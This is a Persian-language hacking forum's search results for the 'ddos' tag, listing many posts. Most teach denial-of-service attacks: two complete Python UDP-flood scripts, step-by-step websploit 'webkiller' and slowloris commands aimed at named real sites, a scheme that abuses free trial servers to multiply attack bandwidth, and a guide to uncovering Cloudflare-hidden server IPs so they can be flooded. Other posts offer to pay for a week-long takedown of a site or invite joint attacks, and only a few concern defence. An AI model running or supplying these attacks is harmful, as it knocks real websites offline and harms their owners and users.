جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'ddos'.
49 نتیجه پیدا شد
-
ddos ابزار های دیداس توسط گارد ایران
MrExploit پاسخی ارسال کرد برای یک موضوع در ابزار حملات Dos & DDOS
سلام خدمت تمامی کاربران عزیز گارد ایران چندوقتی هست که نتونستم پستی بزارم توی این تاپیک میخوام عوض همشو در بیارم خخخ در این تاپیک تمامی ابزار های دیداس که توسط Guardiran.org نوشته شده قرار خواهد گرفت لطفا در پایین تاپیک دکمه تشکر یادتون نره -
سلام. عزیزان خیلی وقته دنبال ابزاری در کال لینوکس برای اف کردن سایت میگردم اگر کسی میدونه لطفا راهنمایی کنه متاسفانه VPS ندارم و بشه با نت معمولی دیداس زد به سایت
-
حمله DDOS به یک سایت
graboid پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام و وقت به خیر دوستان به شخصی نیاز داریم که بتونه با حمله ddos یک سایت خارجی رو به مدت یک هفته Down کنه . دستمزد خوبی هم داده میشه- 3 پاسخ
-
- attack dos
- attack
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
ddosatack حملات DDos با python
nope پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام اموزش حملات DDos با پایتون: Code: #!/usr/bin/python ''' Imports ''' import socket,thread, os, platform, sys, time system = platform.uname()[0] mess = "0101" def cls(): if system == 'Linux': # Mac = clear os.system("clear") elif system == 'Windows': os.system("cls") else: print("\nPlease, Run This Programm on Windows, Linux!\n") sys.exit() def main(): cls() print("----[ DDos Attack ] -----\n") host = raw_input("\nEnter host: ") port = input("\nEnter port: ") time.sleep(2) ip = socket.gethostbyname(host) def dos(attack): while True: try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(mess, (host, port)) print "\nThe packet send to: " + ip except: # code sys.exit() for attack in xrange(port): try: thread.start_new_thread( dos , ("Thread-"+str(attack),) ) except: # Code sys.exit() try: while True: pass except: sys.exit() if __name__ == '__main__': try: main() except: sys.exit() روش 2: روش دوم زیاد کارایی نداره ولی خب اگه بدونیم ضرری نداره: دستور : ping host -t -l packet -
سلام امروز یک ابزاری رو ساختم که صفحه ادمین رو پیدا میکنه و هم کرکش میکنه. اگر مشکلی هست همین جا بگید. این اسکریپت با پایتون 3 نوشته شده git clone [Hidden Content] cd Butcher chmod +x * python3 -m pip install -r requirements.txt python3 run.py منتظر نسخه های دیگر باشید. در پناه حق.
-
سلام دوستان آموزش می خوام ی روش کاربردی بهتون آموزش بدم که در حملات دیداس خیلی کار آمد هست شاید ما اونقدر پهنای باند خوبی برای انجام این حمله نداشته باشیم و موفق به دان کردن سرور نشیم اینجاست که خلاقیت به کار ما میاد اونم این هست که از سرور هایی که داریم کمک بگیریم که شاید بعضی ها سرور نداشته باشن و یا سرورشون برای این کار مناسب نباشه دقیقا این نقطه شروع ی خلاقیت جالبه ما سایت های زیادی رو میبینیم که قبل از اینکه سرور بفروشن اون رو به افراد برای یک روز و تست کردن سرور مجانی میدن حالا ما با استفاده از همین روش پهنای باند خودمون رو بزرگ تر می کنیم خب صحبتش ساده هست اما انجام چجوری هست من برای مثل یک سایت رو بهتون معرفی می کنم [Hidden Content] این سایت برای 30 دقیقه بهتون سرور میده که تستش کنید 30 برای ی هکر خیلی زیاد هم هست تنها کاری که باید کرد اینه که ی ابزار دانلود کنی و ران کنی به همین راحتی چیز جالب تر این هست که بعد از 30 دقیقه سرور از دسترس شما خارج نمیشه و فقط ی صفحه برای شما میاره بالا که میگه اگر سرور رو می خواید ثبت نام کنید و سرور که شما بهش دستور دیداس دادید هم داره کار خودش رو انجام میده من برای نمونه یک فیلم ضبط کردم که می تونید پایین تاپیک مشاهدش کنید فیلم رو ضبط کردم ما به دلیل اینکه حجمش بیشتر از حجم مجاز برای اپلود هستش داخل سایت دیگری اپلودش کردم که می تونید برید و ببینید لینک ویدیو همونطور که در انتهای فیلم دیدید من می تونم هر چندتا سرور که خواستم ازش بگیرم بهتون پیشنهاد می کنم یکی یکی پیش برید یعی یک سرور روی اوکی کنید بعد برید سراغ سرور بعدی سرعت عمل خیلی مهم هستش نکته اخر بعید میدونم nsa.gov به اون راحتی دان شده باشه به احتمال زیاد مشکل از سمت من بود که سایت لود نمیشد
-
ddos دیداس یک سرور
R2L3N پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام بچه ها من میخوام به یک سرور خارجی دیداس بزنم میاین با هم در یک زمان دیداس رو شروع کنیم تا سایت down بشه -
سلام دوستان تو این تاپیک قرار یادبگیریم چجوری با استفاده از پایتون ی ابزار دیداس درست کنیم خیلی راحت این کد رو داخل یک فایل پایتون پیست می کنیم import socket import sys import os import time import platform from subprocess import call import _thread import pyttsx3 #import text = 'Welcome to Anonymous Dos Attack' sound = pyttsx3.init() sound.setProperty('rate' , 110) sound.say(text) sound.runAndWait() # For Clear Page def clear(): if platform not in ('win32', 'cygwin'😞 terminal = 'clear' else: terminal = 'cls' try: call(terminal, shell=True) except OSError as e: print(type(e).__name__, e) clear() # For Clear Page #Code DDOS site = input("Enter your site url => ") thread_count = input("Enter your thread => ") ip = socket.gethostbyname(site) UDP_PORT = 80 MESSAGE = 'BooT SHoDaN' print("UDP target IP:", ip) print("UDP target port:", UDP_PORT) time.sleep(3) def ddos(i😞 while 1: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(bytes(MESSAGE,"UTF-8"), (ip, UDP_PORT)) print("Packet Sent") for i in range(int(thread_count)): try: _thread.start_new_thread(ddos, ("Thread-" + str(i),)) except KeyboardInterrupt: sys.exit(0) while 1: pass #Code DDOS فایل رو سیو می کنم و با استفاده از ترمینال یا cmd باز می کنم ی سری توضیحات بدم از شروع کد ها تا کامنت import کتابخونه های مورد نیاز رو اضافه کردیم از کامنت import تا کامنت for clear page برای این هست که وقتی کاربر کد رو اجرا کرد یک صدا نوشته که ما مشخص کردیم رو بگه از کامنت for clear page اول تا for clear page دوم برای این هست که صفحه پاک بشه ادامه کد ها هم که مربوط به ابزار دیداس هستش البته الان که من کد رو اینجا پیست کردم ی سری ایموجی بهش اضافه شد پس فایلش رو هم این پایین میزارم دانلود کنید که بفهمیدم این کد ها چجوری هستش در ضمن این کد ها با پایتون 3 نوشته شده و بعدی از کتابخونه هاش هم کتابخونه داخل نیستن و باید نصبشون کن که برای دستورات نصب این کتابخونه ها رو میزارم که راحت باشید و نیاز نباشه تو اینترنت دنبال دستور نصبش بگردید -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- pip install threaded pip install pyttsx3 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- اگر کتابخونه جا افتاده به بزرگی خودتون ببخشید تا تاپیک بعدی روز خوشGuardiran.py
-
nonamee
-
عرض سلام و خسته نباشید. تو این فیلمیاد میگیرین که چطور میتونین ای پی مهاجم رو پیداکنین. مبحث بسیار مهم برای کسانی که سرور دارند و مورد حمله ی دیداس قرار میگیرن. جستجو IP.zip
-
سلام خدمت دوستان عزیز در این پست چند برنامه DDoS قرار دادم و یک فایل سورس که میتونید خیلی راحت کامپایل کنید و نحوه ی کد نویسی رو ببینید که خودتون این نوع حملات رو بنویسید با تشکر💖 Mr_Zero Desktop.zip source code.zip
-
با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
-
- ابزار امنیتی
- ابزار هک
- (و 14 مورد دیگر)
-
سلام خدمت تمامی اعضای گارد ایران، میخواستم بدونم برنامه و یا سورسی (به هر زبانی) برای حمله و دیداس ip spoofing وجود داره؟ بهتره طوری باشه بتونم خودم مشخص کنم چه ایپی هایی رو جعل کنه ممنون میشم چند تا رو معرفی کنید
- 4 پاسخ
-
- ip spoofing attack
- attack
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
cloudflare آموزش عملکرد CloudFlare و راهکار های بایپس آن
mownten پاسخی ارسال کرد برای یک موضوع در DOS , DDOS
با سلام خدمت همه ی دوستان خیلی از وبمستر ها از Cloudflare برای ماسک گذاری آی پی سرورشون بمنظور حفاظت در برابر حملات DDOS استفاده می کنن.Cloudflare با نشستن بین کلاینت ها و سرور کار خودش رو انجام میده. با این میانجی گری های Cloudflare، ای پی یک سرور تا زمانی که کلاینت ها از طریق CloudFlare بهش متصل بشن، هیچوقت کشف نخواهد شد. هر حمله ای که صورت میگیره اول از همه به سمت CloudFlare مسیردهی میشه و به بن بست میخوره اما راه های دیگه ای وجود دارن که حمله کننده با اونها میتونه آی پی اصلی سرور رو شناسایی کنه و مستقیماً اقدام به حمله بکنه. در اینجا چندین روش رو میخوام توضیح بدم، یه توضیح خلاصه ای در خصوص پس زمینه ی تئوریک چگونگی و چرایی عملکرد Cloudflare ارائه بدم و بعدش هم توضیحاتی رو در خصوص حل اون موانع بگم: 1- DNS Resolution پس زمینه: اساسی ترین تکنیک اکثر Resolver ها (جاهایی که آی پی محافظت شده توسط CloudFlare رو کشف و اعلام می کنند) استفاده از روش بروت فورس رکورد های DNS هست. اما اول، بذارید توضیح کوچیکی بدم که این چطور کار میکنه. فرض کنید شما صاحب وبسایت example.com با ای پی سرور 111.111.111.111 هستید. عملکرد کلاسیک Cloudflare به شرح عکس زیر هست: بطور خلاصه، شما مدیریت DNS خودتون رو میدید دست CloudFlare. رکورد A دامنه ی شما (که توی عکس نوشتم "وبسایت بدون حفاظ شما") به آدرس آی پی شبکه گسترده و جهانی CloudFlare تغییر پیدا میکنه. الان دیگه کلیه اتصالات به وبسایت example.com بجای آی پی اصلی به آی پی CloudFlare (مثلا 222.222.222.222) ارسال میشن و CloudFlare هم درخواست های پراکسی بین بازدید کننده ها و سرور اصلی رو رزرو میکنه تا این اتصال با وجود یک واسط ایجاد بشه. موضوع این هست که CloudFlare فقط ارتباطات HTTP/HTTPS (پورت های 80 و 443) دریافتی از فضای سراسری وب به ای پی سرور شما رو پراکسی میکنه و از طریق پورت دیگه ای نمیتونه شما رو مخفی بکنه. اینجا چه اتفاقی میفته؟ ماجرا اینه که با وارد کردن آدرس example.com توی مرورگر شما از طریف پورت HTTP یا HTTPS به آی پی 222.222.222.222 وصل میشید ولی اگر بزنید ftp.example.com امکان ارتباط از طریق پورت 21 یا هر سرویس در حال اجرای دیگه ای به وبسایت رو ندارید. چونکه Cloudflare نمیاد پورت 21 شما رو هم محافظت کنه. سرور های CloudFlare به FTP (پورت 21)، SSH (پورت22)، cPanel (پورت 2082) و غیره جواب نمیدن. یک سوال؟ اگر CloudFlare به این درخواست های من جواب نمیده پس چطور مدیر وبسایت به سرور میتونه وصل بشه؟ این جوابی هست که خود CloudFlare داده: راه حل اینه که به سادگی یک رکورد DNS بسازید مثل direct.example.com که بتونید ارتباط مستقیمی به سرور داشته باشید. (مدیرانی که آی پی سرور براشون مهم هست و ممکنه اتصال مستقیمشون به سرور از طریق شبکه ردیابی بشه، این ارتباط رو با پراکسی های دیگه انجام میدن چونکه اگر بدون ملاحظه مسایل امنیتی بخوان مستقیم به سرور وصل بشن ممکنه توی شبکه ی LAN دیده بشه و آی پی لو بره) حمله: حالا فرض کنید که قصد حمله داریم. اگر آدرس example.com رو پینگ کنیم متوجه میشیم که ویژگی حفاظت توسط CloudFlare فعال شده و به این معنی هست که example.com و www.example.com هر دوشون یه ای پی دارن که اونم متعلق به CloudFlare هست. با استفاده از توضیحاتی که بعنوان پس زمینه دادم، میدونید که مدیر کل وبسایت احتمالا زیردامنه های دیگه ای که بطور مستقیم به سرور اصلی متصل میشن و توسط CloudFlare محافظت نمیشن رو ایجاد کرده. خب به راحتی میتونید حدس بزنید این آدرس ها چی هستند و بعدش اونها رو پینگ کنید. بعضی از زیردامنه های عمومی و مشهور mail ، ftp ، ssh ، direct هستند. مثلا webmail.example.com mail.example.com ftp.example.com ssh.example.com direct.example.com باز هم میگم که این روش توسط همه ی Resolver ها (Cloudflare IP resolvers/scripts) مورد استفاده قرار میگیره. برای نمونه اینجا کلیک کنید. (توی این لینک آدرس وبسایتی که میخواد رو وارد کنید و روی Search DNS کلیک کنید. میبینید که این سایت با استفاده از روشی که گفتم DNS هایی که بنظرش ممکنه وجود داشته باشه رو جستجو میکنه و اگر وجود داشته باشن، آی پی شون رو جلوشون مینویسه. همچنین در پایین صفحه به شما میگه که آیا وبسایت توسط CloudFlare تحت محافظت هست یا نه. آی پی CloudFlare هم نشونتون میده) ضد حمله: انجام عملیات های DNS Resolution بر روی وب سایت های محافظت شده توسط CloudFlare یک نوع حمله ی رایج در بین حمله کنندگان هست که اکثر ادمین های محتاط سعی میکنند مواظب زیردامنه های معمول و قابل حمله باشند. اگر شما بعنوان ادمین وبسایت قصد دارید که بدون وجود زیردامنه به سرور اصلی خود متصل شوید، هم می توانید یه دامنه ی کاملا جداگانه ایجاد کنید (مثلا connect.example2.com) و یا اینکه در محیطی امن بصورت مستقیم به سرور خود وصل شوید. *** 2- تاریخچه DNS/Hosting پس زمینه: اگر شما بعنوان ادمین در حال فعال سازی سرویس CloudFlare برای وب خود هستید (example.com)، این رو باید در نظر بگیرید که وب شما از اول کار در دسترس بوده و یه آی پی عمومی هم داشته (111.111.111.111) اگر یک وبسایت برای مدتی (تقریباً یک ماه) بر روی یک آی پی یکسان هاست شده باشه، امکان داره که یه خزنده ی وب (Web Crawler) بهش دسترسی پیدا کرده باشه. خیلی از این خزنده ها جزئیات وبسایت رو بصورت گزارش ذخیره می کنند و ارائه میدن. حمله: حمله کننده میتونه به راحتی تاریخچه ی هاستینگ وبسایت رو توی دیتابیس های مختلف جستجو کنه (LOOK UP) و بفهمه که قبل از راه اندازی سرویس CloudFlare، آی پی سرور اصلی چی بوده. توی تاپیک زیر دو سرویس رایگان برای همچنین حمله ای معرفی کردم: ضد حمله: خوشبختانه حل این معضل امنیتی هم ساده س. اگر دارید وبسایتی رو راه اندازی میکنید و میخواد که آی پی سرور اصلی خودتون رو مخفی نگه دارید، حتماً قبل از اینکه دامنه رو به هاست متصل کنید، سرویس CloudFlare رو تنظیم و فعال کنید. اگر هم آی پی سرور اصلی شما قبلا جایی در دسترس بوده و گزارشی ازش وجود داره، بهترین کار تعویض آی پی هست. اون قدر ها هم سخت نیست که یه آی پی جدید برای هاستتون گیر بیارید. مطمئن بشید که آی پی قدیمی به سرور شما وصل نمیشه -
شناسایی IP محافظت شده توسط Cloudflare
mownten پاسخی ارسال کرد برای یک موضوع در حملات شبکه و راههای مقابله
سلام. دو تا وبسایت رو میخوام معرفی کنیم که آی پی محافظت شده ی وبسایت ها توسط Cloudflare رو شناسایی میکنه و شما میتونید بعد از کسب آی پی اقدام به ddos کنید: Cloud Flare IP Resolver Net Craft -
DOS
Worst_board پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
بسم الله الرحمن الرحيم subject:dos Worst_board ? در این تاپیک اموزش حمله ی DOS رو میدم کالی لینوکس ابزار بسیار قوی داره که تقریبا کار های مهمی بر دوش این برنامه است و خیلی هم تاحالا موفق عمل کرده. نام این برنامه websploit هست . این برنامه امکانت زیادی (modulse)های بسیاری داره . ما تو این تاپیک از ماژول قدرتمند network/webkiller استفاده میکنیم ترمینال رو باز کنید Worst_board ? دستور : websploit رو تایپ کنید صبر کنید تا برنامه بالا بیاد سایت( target ) مورد نظر رو باید قبل از ورود به برنامه پیدا کنید Worst_board ? دستور زیر را تایپ کنید: use network/webkiller سپس تایپ کنید: برای اطلاعات بیشتر بدست آوردن در این زمینه show options تایپ کنید: set target.com تایپ کنید: run و حالا کار تمام است صبر کنید تا نتیجه بگیرید. Worst_board ? -
درود کلی موضوع آماده کرده بودم که بعد از فیلترخارج شدن بزارم ولی جو سایت یکم خطرناک به نطر میاد به همین دلیل به موضوعات برنامه نویسی بسنده میکنم یه دیداسر ساده با پایتون نوشتم که البته برا اینکه یه سایت رو کامل از کار بندازید کارساز نیست ولی بیشتر جنبه آموزشی داره خیلی ساده و گویا سعی کردم بنویسم تا هر کسی متوجه بشه dos.py
-
اموزش دیداس در کالی لینوکس
Mr_007 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام و درود امروز میخوام اموزش دیداس یا همون حمله به سرور با کالی رو یاد بدم. خیلی سادست. خب اول ببینم دیداس زدن اصلا چیه: ی توضیح ساده میدم. به فرستادن یک پیام به تعداد بسیار زیاد و پشت سر هم به سرور که باعث هنگ کردن و سپس از کار افتادن سرور ( موقتی، دائمی ) دیداس زدن میگویند. ی چیزی تو مایه های اسپم هست ولی اینبار به سرور. خب اموزش: ابتدا ترمینال را باز کنید. سپس دستور زیر راوارد کنید و اینتر را بزنید: websploit سپس وب اسپلویت اجرا میشود. سپس دستور: use network/webkiller را بزنید و اینتر را بزنید. سپس باید تارگت خودتون رو برای دیداس ست کنید. از دستور زیر استفاده کنید: set TARGET [Hidden Content] به جای جمله قرمز رنگ، تارگتتون رو وارد کنید. اینتر را بزنید. در اخر با زدن دستور: run عملیات دیداس اغاز میشود. لذت ببرید! تشکر فراموش نشه -
آنتی دیداس - امنیت سرور
Mr_007 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام تقدیم به دوستان گارد ایران این آموزش تصویری بهمراه صدا هستش. شما در این فیلم اموزشی یاد میگیرین که چطور میتونین به حملاتی که به سمت سرور شما میشه تا باعث تکذیب سرویس شدن یا از دسترس خارج شدن سرورتون میشه که عامیانه بهش دیداس هم میگن بصورت نرم افزاری مقابله کنین. انتی دیداس.rar -
تست ddos به ویندوز سرور 2003 در virtual یا vmware
morteza69 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های ابزارهای امنیتی
با سلام در محیط ویرچوال باکس ی ویندوز سرور و ی کالی و ی ویندوز xp نصب کردم میخوام با ابزارهایی هم در کالی و هم در xp حمله dos رو داشته باشم ممنون میشم راهنماییم کنید ک اولا روی سرور باید چ کنم و در ساده ترین حالت ممکن چ سرویسی ارایه بدم و بعدش بتونم در اون دوتا سیستم عامل حمله صورت بگیره ؟ هدف فقط نمایش حمه dos و خوابوندن سرویسی هست ک ارایه میده ممنونم ♥ -
سلام خدمت دوستان عزیز در گارد ایران براتون تعدادی دیداسر قدرتمند تهیه کردم. دوستان سعی میکنم جدید ترین ابزار های دیداس را در همین topic قرار بدم. X-DataBase Error v2.0 لینک اسکن [Hidden Content] تشکرفراموش نشه X-DataBase Error v2.0PROFESSIONAL EDITION.zip
- 14 پاسخ
-
- دیداسر قدرتمند
- بهترین دیداسر ها
- (و 8 مورد دیگر)
-
با سلام و درود خسته نباشید همینطور که میدونید حمله DDOS روش های متعددی داره یکیش هم اینیه که الان مینویسم سیستم عامل مورد استفادمون کالی لینوکس V:2.0 هستش تو کالی فضای ترمینال رو باز میکنیم بعد دستور WEBSPLOIT رو وارد میکنیم بعد تو WSF دستور USE NETWORK/WEBKILLER رو وارد میکنیم و حالا در آخر تارگت رو به سیستم میدیم یعنی دستور SET TARGET WWW.EXAMPLE.COM رو وارد میکنیم که باید به جای EXAMPLE تارگت مورد نظر رو باس بنویسید مثلا برای حمله به Google.com باید دستور SET TARGET Www.google.com رو وارد کنیم حالا برای این که سیستم حمله رو شروع کنه دستور RUN رو میدیم تا حمله به سیستم آغاز بشه به همین راحتی به همین خوشمزگی موفق باشید :) :) :) :)
-
با سلام و درود این اولین موضوعیه که قرار میدم برا همین اگه نوشتنم بد بود یا نتونستم مطلبو برسونم بزارید پای صفر کیلومتریم خب دیگه این روش DDOS با استفاده از SLOWLORIS.PL هستش توضیح زیادی نمیدم چون همتون اهل فن هستید و هم سرتونو درد نیارم برای اینکه این حمله رو انجام بدید باید اول فایل SLOWLORIS.PL رو داشته باشید که من آپلودش کردم و لینکش رو براتون قرار میدم اینم لینک تا دانلود کنید [Hidden Content] سیستم مورد استفادمون کالی لینوکس V:2.0 هستش تو کالی فضای ترمینال رو باز میکنیم بعد دستور مینویسیم:cd desktop بعد دستور میدیم:perl slowloris.pl و حالا دستور آخر: perl slowloris.pl _dns www.example.com _options یادتون باشه که به جای example تارگت رو مینویسیم یعنی اگه بخواییم به سایت آپارات حمله کنیم باس بنویسیم perl slowloris.pl _dns www.aparat.com _options امید واردم خوب نوشته باشم ولی اگه اشتباهی چیزی هست نزنید تو ذوقم هاااا
-
سلام خدمت دوستان عزیز.براتون ابزار سرور کیلر(server killer)رو آماده کردم.ابزاری قدرتمند در زمینه داون(down)کردن سرورهاست.امیدوارم از این ابزار نهایت استفاده و لذت رو ببرین.با تشکر از تمامی دوستان گارد ایران. Pass:guardiran.org Server Killer.rar
- 3 پاسخ
-
- ابزار داس
- ابزار دیداس
-
(و 8 مورد دیگر)
برچسب زده شده با :